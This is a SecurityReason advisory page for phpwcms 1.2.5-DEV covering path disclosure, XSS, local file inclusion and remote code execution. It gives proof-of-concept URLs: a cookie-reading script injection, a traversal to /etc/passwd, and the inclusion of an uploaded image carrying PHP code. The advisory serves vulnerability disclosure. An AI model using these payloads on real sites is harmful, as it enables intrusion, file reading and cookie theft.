|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 939 CVE : CVE-2006-2519 CVE : CVE-2006-2518 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : alireza hassani (trueend5 yahoo com) Published : 24.05.2006
Advisory Content : Vendor: http://www.phpwcms.de Bugs: Path Disclosure, XSS, Local File Inclusion, Remote Code Execution Vulnerable Version: phpwcms 1.2.5-DEV (prior versions also maybe affected) Exploitation: Remote with browser Description: -------------------- phpwcms is a web content management system optimized for fast and easy setup on any standard web server. phpwcms is perfect for professional, public and private users. Vulnerability: -------------------- -->>Path Disclosure<<-- Reason: direct access to include files that generates php error with installation path information. Several files are vulnerable in this case. Example: http://example.com/phpwcms/include/inc_lib/files.public-userroot.inc.php http://example.com/phpwcms/include/inc_lib/files.private.additions.inc.p hp -->>XSS<<-- Reason: when register globals is enable several template files are vulnerable to xss. Example: http://localhost/php/phpwcms/include/inc_tmpl/content/cnt6.inc.php?BL[be _cnt_plainhtml]=<script>alert(document.cookie)</script> Code Snippet: /include/inc_tmpl/content/cnt6.inc.php //line#28 <?php echo $BL['be_cnt_plainhtml'] ?> -->>Local File Inclusion<<-- Reason: Incorrect use of spaw script (external script) and its configuration result in local file inclusion when register globals is enable and gpc_magic_quotes is Off. http://localhost/php/phpwcms/include/inc_ext/spaw/spaw_control.class.php ?spaw_root=../../../../etc/passwd%00 Code Snippet: /include/inc_ext/spaw/spaw_control.class.php //lines:#15-20 if (preg_match("/:///i", $spaw_root)) die ("can't include external file"); include $spaw_root.'config/spaw_control.config.php'; include $spaw_root.'class/util.class.php'; include $spaw_root.'class/toolbars.class.php'; include $spaw_root.'class/lang.class.php'; -->>Remote Code Execution<<-- Reason: It is possible for an attacker to upload a picture with php code as EXIF metadata content in his post and then he can uses above vulnerability to conduct remote code execution. Example: http://example.com/phpwcms/include/inc_ext/spaw/spaw_control.class.php?s paw_root=../../../picture/upload/shell.jpg%00 Solution: -------------------- Vendor has been contacted but we are not aware of any vendor supplied patch. Original Advisories: -------------------- http://www.kapda.ir/advisory-331.html IN Farsi:http://irannetjob.com/ Credit: -------------------- Discovered & released by trueend5 (trueend5 kapda ir) Security Science Researchers Institute Of Iran [http://www.KAPDA.ir] __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |